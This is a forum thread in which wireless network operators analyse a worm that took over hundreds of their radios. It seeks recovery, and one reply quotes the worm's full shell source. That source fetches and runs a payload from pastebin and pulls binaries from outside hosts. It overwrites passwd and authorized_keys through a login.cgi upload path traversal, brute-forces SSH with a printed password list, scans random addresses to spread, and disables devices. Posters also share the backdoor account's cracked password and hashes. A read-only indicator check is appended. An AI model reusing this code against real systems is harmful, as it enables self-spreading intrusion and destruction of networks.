New Member
Posts: 21
Registered: ‎04-22-2015
Kudos: 4
Accepted Solution

Virus atack v2

[ Edited ]

Got 230 units infected this morning, all in an internal network with no direct access to the Internet (firmware 5.5.8-5.5.10-u)

Got a chance to get this information before the radio got restarted; it is from /tmp/upload

Question is: could we use the same way that the virus uses to infect the radio to get control back?

 

 

as you see they changed the username to "moth3r" have to add 

 <pre>

XW.v5.5.10-u2# cd upload/
XW.v5.5.10-u2# ls
authorized_keys  passwd
XW.v5.5.10-u2# cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDipI6pZahigzgPRR3TB14ystpbrAedhG8K/J2I/XZpBDw2EHdLMRSwp0Pl6j0hK9WDAhrWR1Xs6dyZeRmfOALFpfkmS3G1enTLLoVQfZqimBNEd6gBPuYK5Z7kcZARtPpYwep/iDAP3f2i4f54So1xs09Gfsoy6ENXM/ei47qJrOlr5CHeqJJRHH8gUyvb6ZHaqi8Hq1tvGfp/ViX07Cf6mzCY/3P0xLHoaDgkbsDreOEIsH2u/laSsmY+cmhAgET7Bf3ddRKB5YyZuIruX8x6a9g+owc5uCKdcCrxEilYwTwLS6lv/WuC/Mhxmg1Z2696z2nou+E1PifMabuJXcnd mother@fu *have to add this to avoid filter* cker
XW.v5.5.10-u2# cat passwd
moth3r:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh
XW.v5.5.10-u2#

</pre>


Accepted Solutions
New Member
Posts: 7
Registered: ‎06-06-2016
Kudos: 3
Solutions: 1

Re: Virus atack v2

I found an interesting part of the virus code:

 

<pre>
grep "moth3r" /etc/passwd >/dev/null || echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd
for prt in 80 443; do
iptables -I INPUT -p tcp --dport $prt -j DROP 2>/dev/null
iptables -I INPUT -p tcp -i lo --dport $prt -j DROP 2>/dev/null
done
</pre>

 

Change user and pass to moth3r:f u c k e.3r

f u c k e r is without spaces

and block port 80 and 443 at ubnt firewall.

If you do not have web access to the device you can access it over ssh with moth3r:f u c k e.3r and manually clean the virus.

 



All Replies
SuperUser
Posts: 16,608
Registered: ‎02-03-2013
Kudos: 9085
Solutions: 597
Contributions: 2

Re: Virus atack v2

You need to upgrade your radios to the latest firmware.  These firmwares are old.  

ubiquiti certified trainer :: ubwa | uewa
New Member
Posts: 21
Registered: ‎04-22-2015
Kudos: 4

Re: Virus atack v2

It's an awesome idea but there is no access to the radio at all and the password was changed by the virus

What we really need is disclosure of this bug and a publicly available tool to use it to restore access to the radio

Established Member
Posts: 1,840
Registered: ‎10-05-2014
Kudos: 312
Solutions: 48

Re: Virus atack v2


@Sergei_kha wrote:

It's an awesome idea but there is no access to the radio at all and the password was changed by the virus

What we really need is disclosure of this bug and a publicly available tool to use it to restore access to the radio


Can you edit your first post please and put the command line output in Code tags <pre>code</pre>

 

Regards,

Do not expect me to reply to this post, I'm not sure that I will be able to find it, thanks to ....

Established Member
Posts: 1,840
Registered: ‎10-05-2014
Kudos: 312
Solutions: 48

Re: Virus atack v2


@ClaudeSS wrote:

You need to upgrade your radios to the latest firmware.  These firmwares are old.  


Old firmware doesn't have the upload directory!!! Beware!!!

Do not expect me to reply to this post, I'm not sure that I will be able to find it, thanks to ....

New Member
Posts: 6
Registered: ‎06-04-2016

Re: Virus atack v2

The password is different

script has a passwd file but inside script is command:

echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd

 

so, the hash is $1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK

anyone crack it?

Established Member
Posts: 1,840
Registered: ‎10-05-2014
Kudos: 312
Solutions: 48

Re: Virus atack v2


@lsl wrote:

The password is different

script has a passwd file but inside script is command:

echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd

 

so, the hash is $1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK

anyone crack it?


echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd

This command will add user moth3r as Administrator to your password file?

No, you don't crack the password, you have to brute-force recalculate the hash once you have the salt and the full hash. It will take time and CPU.

To start the process I need the exact string in between code tags (html <pre>code</pre>).

Warning!!! If you didn't reboot yet, just don't!!! If you do, you will be locked out. Get Linux access, set up a password for your user, go to /etc/passwd, copy the (known) passwd from your user and change the password on the Ubiquiti device / save before reboot. Aka Linux boot password bypass without crackjack

 

Regards,

 

PS. I will see you tomorrow

Do not expect me to reply to this post, I'm not sure that I will be able to find it, thanks to ....

New Member
Posts: 6
Registered: ‎06-04-2016

Re: Virus atack v2

attached mf.tgz

https://www.sendspace.com/file/o10no2

found on ubnt, also with mf.tar

Inside this file is code I pasted

New Member
Posts: 21
Registered: ‎04-22-2015
Kudos: 4

Re: Virus atack v2

Brute-forced it successfully

it's fu cker 

no space, obviously

New Member
Posts: 21
Registered: ‎04-22-2015
Kudos: 4

Re: Virus atack v2

Current situation is

 

firmware 5.5.10-u    47 units

username moth3r

password fu cker

 

firmware 5.5.10 

 

password changed by the virus and unknown. moth3r/fu ker doesn't work

I identified the attack source: it was an old AirRouter with an external IP.

 

New Member
Posts: 6
Registered: ‎06-04-2016

Re: Virus atack v2

 

$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/ is f****r

$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1 is not.

 

checked by hashcat

New Member
Posts: 14
Registered: ‎06-04-2016
Kudos: 3

Re: Virus atack v2

[ Edited ]

Today's situation is even worse...

After a physical reset I cannot log in either...

UPDATE: false alarm. My technician did the reset procedure the wrong way. But there are still about 300 devices left.

 

New Member
Posts: 7
Registered: ‎06-05-2016

Re: Virus atack v2

Does a TFTP reset with firmware upload work?

New Member
Posts: 14
Registered: ‎04-10-2012

Re: Virus atack v2

 

We have some devices which have been infected.

The units are PowerBridges and they seem to be rebooting every 30 minutes or so.

 

The Malware has changed the password as I can't log in with our password or mother/fu****r

I have tried moth3r with all sorts of passwords but no joy

 

Can anyone help with this ? 

 

Jay

Established Member
Posts: 1,840
Registered: ‎10-05-2014
Kudos: 312
Solutions: 48

Re: Virus atack v2


@lsl wrote:

attached mf.tgz

https://www.sendspace.com/file/o10no2

found on ubnt, also with mf.tar

Inside this file is code I pasted

Thank you for sharing

 

# ls
download  infect  mfid  mfid.pub  mother  p  passlst  passwd  scan  sprd

# cat download
#!/bin/sh
if [ ! -z "$1" ]
then
for cc in  "http://pastebin.com/raw/vR3xrUcz"
do
wget -O - $cc |tr -d '\r'>/tmp/mfpl$$
k=`grep nomorelies /tmp/mfpl$$ 2>/dev/null | md5sum | cut -d" " -f1`
[ "$k" = "d709745c628f6682ae506d54e4320a28" ] && mv /tmp/mfpl$$ /tmp/mfpl && break
done
rm /tmp/mfpl$$ 2>/dev/null
fi
[ -e /usr/bin/curl ] && exit 0
per=/etc/persistent/.mf
[ -e $per/curl ] && exit 0
test -d $per || mkdir -p $per
test -d /tmp/down || mkdir /tmp/down
cd /tmp/down
dwn() {
wget -O temp.ipk $1
tar -xzf temp.ipk
tar -xzf data.tar.gz
mv $2 $per
rm -rf /tmp/down/*
}
test -e /etc/openwrt_release && owrt=`grep CODENAME /etc/openwrt_release | sed "s/.*=\([^ /]*\).*/\1/g" |tr -d \'`
arc=adm5120
test -e /etc/openwrt_release && arc=`grep TARGET /etc/openwrt_release | sed "s/.*=\([^ /]*\).*/\1/g" | cut -c 2-`
test ! -z "$owrt" && test ! -e /usr/bin/curl && opkg update && opkg install curl
if test ! -e /usr/bin/curl; then
for srv in "downloads.openwrt.org" "bo.mirror.garr.it/mirrors/openwrt"
do
test -e $per/curl || dwn http://$srv/kamikaze/8.09.1/$arc/packages/curl_7.17.1-1_mips.ipk usr/bin/curl
chmod +x $per/curl
test -e $per/libcurl.so.4 || dwn http://$srv/kamikaze/8.09.1/$arc/packages/libcurl_7.17.1-1_mips.ipk usr/lib/libcurl.so.4.0.1
mv $per/libcurl.so.4.0.1 $per/libcurl.so.4
test -e $per/libssl.so.0.9.8 || dwn http://$srv/kamikaze/8.09.1/$arc/packages/libopenssl_0.9.8i-3.1_mips.ipk 'usr/lib/lib*'
test -e $per/libz.so.1 || dwn http://$srv/kamikaze/8.09.1/$arc/packages/zlib_1.2.3-5_mips.ipk 'usr/lib/lib*'
done
fi

I like Robert Redford in Sneakers

 

 

# cat infect
#!/bin/sh
trap '' HUP
per=/etc/persistent/.mf
cd $per
crl="LD_LIBRARY_PATH=$per/ ./curl"
test -e /usr/bin/curl && crl=/usr/bin/curl
ip=$1
sshprt=$3
pre=$4
[ $(echo $ip|cut -d. -f1) -eq "127" ] && exit 0
if [ -z "$sshprt" ]
then
for prt in 22 2222
do
is=`sh -c "$crl -s  -m 3 $ip:$prt 2>/dev/null|grep -i dropbear|wc -l"`
[ "$is" = "1" ] && { sshprt=$prt;break; }
done
fi
if [ "$2" = "dbss" ] && [ ! -z "$sshprt" ]
then
( sleep 30 ; killall ssh ) &
cat ../mf.tgz | ssh -p$sshprt -y -y -i mfid moth3r@${ip} "mkdir -p /etc/persistent/.mf; cat > /etc/persistent/mf.tgz; cd /etc/persistent/;tar -zxf mf.tgz;/etc/persistent/.mf/p"
exit 0
fi

cu() {
wh=$1
to=$2
ur=$3
sh -c "$crl -s -m 4 -F 'file=@$per/$wh;filename=../../etc/$to' -H 'Expect:' '$ur/login.cgi' -k 2>/dev/null >/dev/null"
}

if [ ! -z "$sshprt" ] && [ -z "$pre" ]
then
for p in "https" "http"
do
is=`sh -c "$crl -s -L -k -c /tmp/ac -m 3 $p://$ip 2>/dev/null | grep airos | wc -l"`
[ "$is" = "1" ] && { pre=$p;break; }
done
fi


if [ ! -z "$pre" ]
then
echo $ip >> /tmp/inf
cu passwd passwd $pre://${ip}
cu mfid.pub dropbear/authorized_keys $pre://${ip}
( $per/infect $ip dbss $sshprt ) &
elif [ ! -z "$sshprt" ] && [ "$BRUT" = "1" ] && grep BEAR_PASSWOR /usr/bin/ssh 2>/dev/null
then
for usr in root ubnt admin; do
for pwd in $(cat passlst); do
cat ../mf.tgz | DROPBEAR_PASSWORD=$pwd ssh -I3 -p$sshprt -y "$usr"@${ip} "mkdir -p /etc/persistent/.mf; cat > /etc/persistent/mf.tgz; cd /etc/persistent/;tar -zxf mf.tgz;/etc/persistent/.mf/p"
done
done
fi

 

Let's see the mother

 

# cat mother
#!/bin/sh
neigh () {
echo 192.168.1.20 > /tmp/near
ubntbox discover|grep ..:..:..:|cut -d" " -f2>>/tmp/near
for ip in `ifconfig | grep Bcast | sed "s/.*Bcast:\([^ ]*\).*/\1/g"`; do ping -c2 $ip;done
ip neigh|cut -d" " -f1|grep -v :>>/tmp/near
for ip in `sort -u /tmp/near`;do
($per/.mf/infect $ip)&
sleep 15
done
}
scneigh () {
max=2500
[ ! -z "$1" ] && max=$1
n=1
for ip in `ifconfig | grep "inet addr:" | grep -v 127.0.0.1 |sed "s/.*inet addr:\([^ ]*\).*/\1/g"`; do
(sleep $((n*max*2)); $per/.mf/scan $ip $max $2>/dev/null >/dev/null )&
n=$((n+1))
done
}
cfg () {
sed -i 's/$1=.*/$1=$2/' /tmp/system.cfg
}
f*ckit () { 
if [ -e /usr/bin/cfgmtd ]
then
grep 'motherf' /tmp/system.cfg>/dev/null || cp /tmp/system.cfg $per/cfg
cfg 'dhcpc.1.status' 'disabled'
cfg 'resolv.host.1.name' 'ubnt'
cfg 'wireless.1.ssid' 'mootherf u c k e r'
cfg 'radio.1.mode' 'Master'
cfg 'system.button.reset' 'disabled'
rm -rf $per/.mf/lib*
(sleep 30; reboot -f) &
/usr/bin/cfgmtd -p /etc -f /tmp/system.cfg -w
fi
}
air () {
[ `cat $per/tick` -gt 4 ] && return
(sleep 3000;reboot -f)&
(wlanconfig ath0 destroy;wlanconfig ath0 create wlandev wifi0 wlanmode sta nosbeacon;iwconfig ath0 essid any;ifconfig ath0 up;iwlist ath0 scan)&
sleep 30
iwlist scan
for cnt in `seq 10`
do
iwlist scan 2>/dev/null| awk -F '[:=]+' '/(ESS)/{ printf $2" " } /level/{printf $4" "} /Encr/{ print $2 }'| grep -v " on" | awk -F' ' '{print $2,$1}'|sort -rn|cut -d'"' -f2>/tmp/aps
killall -9 udhcpc
for ap in `cat /tmp/aps|tr -d'"'`
do
ifconfig ath0 down
iwconfig ath0 essid $ap
ifconfig ath0 up
sleep 40
/sbin/udhcpc -q -f -i ath0 -s /etc/udhcpc/udhcpc -p /tmp/dhp -hmf$$
if [ $? -eq 0 ]
then
neigh
fi
done
done
reboot -f
}
loop () {
per=/etc/persistent
test -d $per/.mf || mkdir -p $per/.mf
cd $per/.mf
echo $((`cat $per/tick 2>/dev/null`+1)) > $per/tick
(cfgmtd -w -p /etc)&
[ `cat $per/tick` -gt 30 ] && f*ckit
shl=`cat /etc/shells | head -1`
test -z "$shl" && shl=/bin/sh
grep "moth3r" /etc/passwd >/dev/null || echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd
for prt in 80 443; do
iptables -I INPUT -p tcp --dport $prt -j DROP 2>/dev/null
iptables -I INPUT -p tcp -i lo --dport $prt -j DROP 2>/dev/null
done
sleep 200
$per/.mf/download;
cnt=0
($per/.mf/sprd 2>/dev/null >/dev/null)&
($per/.mf/sprd 2>/dev/null >/dev/null)&
($per/.mf/sprd 2>/dev/null >/dev/null)&
while true
do
[ "$cnt" -eq 5000 ] && f*ckit
[ $((`date "+%H"`%3)) -eq 0 ] && [ "$cnt" -eq 15 ] && air
[ $((cnt%10)) -eq 0 ] && $per/.mf/download up
[ $((cnt%10)) -eq 0 ] && [ -e /tmp/mfpl ] && chmod +x /tmp/mfpl* && /tmp/mfpl
[ $((cnt%60)) -eq 0 ] && neigh
[ $((cnt%180)) -eq 0 ] && scneigh
[ $((cnt%300)) -eq 0 ] && scneigh 900 -4
pidof sprd>/dev/null || ($per/.mf/sprd 2>/dev/null >/dev/null)&
cnt=$((cnt+1))
sleep 60
done
}
if [ -z "$1" ]
then
($0 1)&
else
loop
fi

 

# cat p
#!/bin/sh
per=/etc/persistent
shl=`cat /etc/shells | head -1`
test -z "$shl" && shl=/bin/sh
grep "moth3r" /etc/passwd >/dev/null || echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >> /etc/passwd
grep "f/mother" $per/rc.poststart 2>/dev/null >/dev/null || echo "cd $per;tar -zxf mf.tgz;$per/.mf/mother&">>$per/rc.poststart
chmod +x $per/rc.poststart
test -e /etc/rc.local && cat $per/rc.poststart>/etc/rc.local
if [ -e /usr/bin/cfgmtd ]
then
echo -n >/etc/dropbear/authorized_keys
cfgmtd -w -p /etc/; sleep 30; reboot -n -f >/dev/null
fi
# cat scan
#!/bin/sh
trap '' HUP
cd /etc/persistent/.mf/
ip=$1
p1=$(echo $ip | cut -d "." -f1)
test ! -z "$p1" || p1=1
p2=$(echo $ip | cut -d "." -f2)
test ! -z "$p2" || p2=0
p3=$(echo $ip | cut -d "." -f3)
test ! -z "$p3" || p3=0
p4=$(echo $ip | cut -d "." -f4)
test ! -z "$p4" || p4=1
p3c=0
p2c=0
p1c=0
[ ! -z "$3" ] && [ "$3" -gt 0 ] &&  p4=$((p4+$3))
[ ! -z "$3" ] && [ "$3" -lt 0 ] && [ $(($p3+$3)) -ge 0 ] &&  p3=$((p3+$3))
if [ "$p4" -gt 255 ]
then
d=$((p4/256))
echo LOG:here $d $p4
p4=$((p4%256))
p3=$((p3+d))
p3=$(($p3%256))
fi
maxp1=128
maxp2=256
cnt=0
test $p1 -eq "10" && pvt=0
test $p1 -eq "192" -a $p2 -eq "168" && pvt=0 && maxp2=1
test $p1 -eq "172" -a $p2 -eq "16" && pvt=0 && maxp2=1
test ! -z "$pvt" && maxp1=1
while [ $p1c -lt $maxp1 ]
do
while [ $p2c -lt $maxp2 ]
do
while [ $p3c -lt 256 ]
do
while [ $p4 -lt 255 ]
do
ip="$p1.$p2.$p3.$p4"
./infect $ip
p4=$((p4+1))
cnt=$((cnt+1))
[ ! -z "$2" ] && [ "$cnt" -gt "$2" ] && exit 0
done
p4=1
p3=$((p3+1))
if [ "$p3" -gt 255 ] ; then p3=0 ; fi
p3c=$((p3c+1))
done
p4=0
p3c=0
p3=0
p2=$((p2+1))
if [ "$p2" -gt 255 ] ; then p2=0 ; fi
p2c=$((p2c+1))
done
p4=0
p3=0
p3c=0
p2=0
p2c=0
p1=$((p1+1))
if [ "$p1" -gt 223 ] ; then p1=1 ; fi
p1c=$((p1c+1))
done
# cat sprd
#!/bin/sh
per=/etc/persistent/.mf
cd $per
test -e /usr/bin/curl && crl=/usr/bin/curl
test -e /usr/bin/curl || test -e $per/curl || ./download
cnt=0
while true; do
ip=`dd if=/dev/urandom bs=4 count=1 2>/dev/null | hexdump -e '4/1 "%u."' -e '"\n"' | cut -d. -f1-4`
$per/infect $ip
if [ "$cnt" = 10000 ] ; then
if [ "$BRUT" = "1" ]
then
export BRUT=0
cnt=0
else
export BRUT=1
cnt=9500
fi
fi
cnt=$((cnt+1))
done

Hmm, smart way to generate a random IP; this is not only private networks.

 

# cat passlst
admin
root
ubnt
ubnt123
password
abcd1234
abcdefgh
qwerty
abc123
111111
123456
123123
123qwe
12345678
admin1
!@#$%^&*
ubiquiti
000000
1q2w3e4r
!Q@W#E$R
1qaz2wsx

Looks like the mfid file is the dropbear ssh-rsa private key and mfid.pub is the public file.

Thanks for sharing again; it is raining outside, a perfect day for reading.

 

Regards,

 

PS. This looks similar to the Steve Gibson grc.com attack

 

Do not expect me to reply to this post, I'm not sure that I will be able to find it, thanks to ....
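Added example (not part of the original posts and not the worm's code): a read-only check for the files, account, key comment and startup hook that appear in the scripts quoted above. The function names `mf_check`, `hit` and `has` are made up for this example; pass `/` on the radio itself or the path of an extracted copy of its filesystem.

```shell
#!/bin/sh
# Indicator check for the "mf" worm scripts quoted in this thread.
# Every path and string tested below is taken from those scripts;
# the function names are assumptions of this example.

MF_HITS=0
hit() { MF_HITS=$((MF_HITS + 1)); echo "INDICATOR: $*"; }
has() { grep "$1" "$2" >/dev/null 2>&1; }     # has PATTERN FILE

mf_check() {
    root="${1%/}"                 # "/" becomes "" so paths join cleanly
    per="$root/etc/persistent"
    MF_HITS=0

    # Files the worm unpacks or creates ("p", "mother", "infect", "download").
    [ -d "$per/.mf" ]      && hit "worm directory $per/.mf"
    [ -e "$per/mf.tgz" ]   && hit "worm archive $per/mf.tgz"
    [ -e "$per/tick" ]     && hit "run counter $per/tick"
    [ -e "$root/tmp/inf" ] && hit "target log $root/tmp/inf"
    for f in "$root"/tmp/mfpl*; do
        [ -e "$f" ] && hit "downloaded payload $f"
    done

    # Persistence: "p" appends a line that starts .mf/mother to rc.poststart
    # and copies rc.poststart over /etc/rc.local when that file exists.
    for f in "$per/rc.poststart" "$root/etc/rc.local"; do
        has 'mf/mother' "$f" && hit "startup hook in $f"
    done

    # Account and SSH key the worm plants.
    has '^moth3r:' "$root/etc/passwd" && hit "moth3r account in $root/etc/passwd"
    has 'mother@' "$root/etc/dropbear/authorized_keys" &&
        hit "worm SSH key in $root/etc/dropbear/authorized_keys"

    # Live system only: "mother" inserts DROP rules for the web UI ports.
    if [ -z "$root" ] && command -v iptables >/dev/null 2>&1; then
        iptables -L INPUT -n 2>/dev/null |
            grep -E '^DROP .*dpt:(80|443)( |$)' >/dev/null &&
            hit "INPUT DROP rule on tcp/80 or tcp/443"
    fi

    [ "$MF_HITS" -eq 0 ]          # status 0 = clean, 1 = indicators found
}

# Run only when a root path is given on the command line.
if [ -n "${1:-}" ]; then
    mf_check "$1" && echo "no mf indicators under $1"
fi
```

The check changes nothing on the device; `MF_HITS` holds the number of indicators found after each call.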

Emerging Member
Posts: 41
Registered: ‎09-23-2010
Kudos: 2

Re: Virus atack v2

I am having the same issue

 

mother

moth3r

f u c k er

 

None are working ... Http, https turned off on antennas now and can only ssh

 

UBNT any ideas ?

 

 

New Member
Posts: 14
Registered: ‎06-04-2016
Kudos: 3

Re: Virus atack v2

What type is this passwd hash? Does anyone know?

Established Member
Posts: 1,840
Registered: ‎10-05-2014
Kudos: 312
Solutions: 48

Re: Virus atack v2


@Heavyd wrote:
 

None are working ... Http, https turned off on antennas now and can only ssh

Do you know how to fix it from ssh?

 


 

Conclusion:

 

This is a user/password attack over ssh

 

<pre>
if [ ! -z "$pre" ]
then
echo $ip >> /tmp/inf
cu passwd passwd $pre://${ip}
cu mfid.pub dropbear/authorized_keys $pre://${ip}
( $per/infect $ip dbss $sshprt ) &
elif [ ! -z "$sshprt" ] && [ "$BRUT" = "1" ] && grep BEAR_PASSWOR /usr/bin/ssh 2>/dev/null
then
for usr in root ubnt admin; do
for pwd in $(cat passlst); do
cat ../mf.tgz | DROPBEAR_PASSWORD=$pwd ssh -I3 -p$sshprt -y "$usr"@${ip} "mkdir -p /etc/persistent/.mf; cat > /etc/persistent/mf.tgz; cd /etc/persistent/;tar -zxf mf.tgz;/etc/persistent/.mf/p"
done
done
fi
</pre>

It will try to log in with username root, ubnt or admin and one of the following passwords:

admin root ubnt ubnt123 password abcd1234 abcdefgh qwerty abc123 111111 123456 123123 123qwe 12345678 admin1 !@#$%^&* ubiquiti 000000 1q2w3e4r !Q@W#E$R 1qaz2wsx

 

On infected devices the attack will stop when the output of the following URL http://pastebin.com/raw/vR3xrUcz

will be nomorelies ...

 

Looks like the revenge of the Pink Panther and is personal.

Do not expect me to reply to this post, I'm not sure that I will be able to find it, thanks to ....

Senior Member
Posts: 3,780
Registered: ‎01-13-2009
Kudos: 708
Solutions: 9

Re: Virus atack v2

Same issue here. AC2 is saying "invalid login credentials" on over 1800 devices now, and 2440 are offline! That's more than 80% of our network! Unbelievable. Is it an AC2 virus? Can ANYONE please crack this "new" password asap???

 

These are all PRIVATE, not public exposed devices, and if the virus was to spread on the same subnet, that is wrong because this is across different subnets and towers, routers, everything. ONLY thing connecting all these together is AC2, could it be an AC2 virus!?!?

 

This is the worst disaster in our WISP history, and it'd be impossible to make over 2,000 truck rolls to reset devices and re-program. 

 

PLEASE ANYONE?!?!

New Member
Posts: 14
Registered: ‎06-04-2016
Kudos: 3

Re: Virus atack v2

Would redirecting pastebin to some http server with a prepared file help?

 
